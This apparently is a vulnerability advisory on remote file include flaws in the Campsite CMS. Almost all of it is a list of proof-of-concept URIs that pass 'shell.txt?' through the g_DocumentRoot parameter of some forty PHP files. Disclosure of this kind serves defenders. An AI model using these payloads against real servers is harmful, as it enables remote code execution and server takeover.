|
|
Campsite G_DocumentRoot Parameter Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues. The following proof-of-concept URIs are available: http://www.example.com/classes/Alias.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Article.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ArticleAttachment.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ArticleComment.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ArticleData.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ArticleImage.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ArticleIndex.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ArticlePublish.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ArticleTopic.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ArticleType.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ArticleTypeField.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Attachment.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Country.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/DatabaseObject.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Event.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/IPAccess.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Image.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Issue.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/IssuePublish.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Language.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Log.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/LoginAttempts.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Section.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/ShortURL.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Subscription.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/SubscriptionDefaultTime.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/SubscriptionSection.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/SystemPref.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Template.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/TimeUnit.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/Topic.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/UrlType.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt? http://www.example.com/classes/UserType.php?g_DocumentRoot=shell.txt? http://www.example.com/configuration.php?g_DocumentRoot=shell.txt? http://www.example.com/db_connect.php?g_DocumentRoot=shell.txt? http://www.example.com/priv/localizer/LocalizerConfig.php?g_DocumentRoot=shell.txt? http://www.example.com/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt? |
|
Privacy Statement |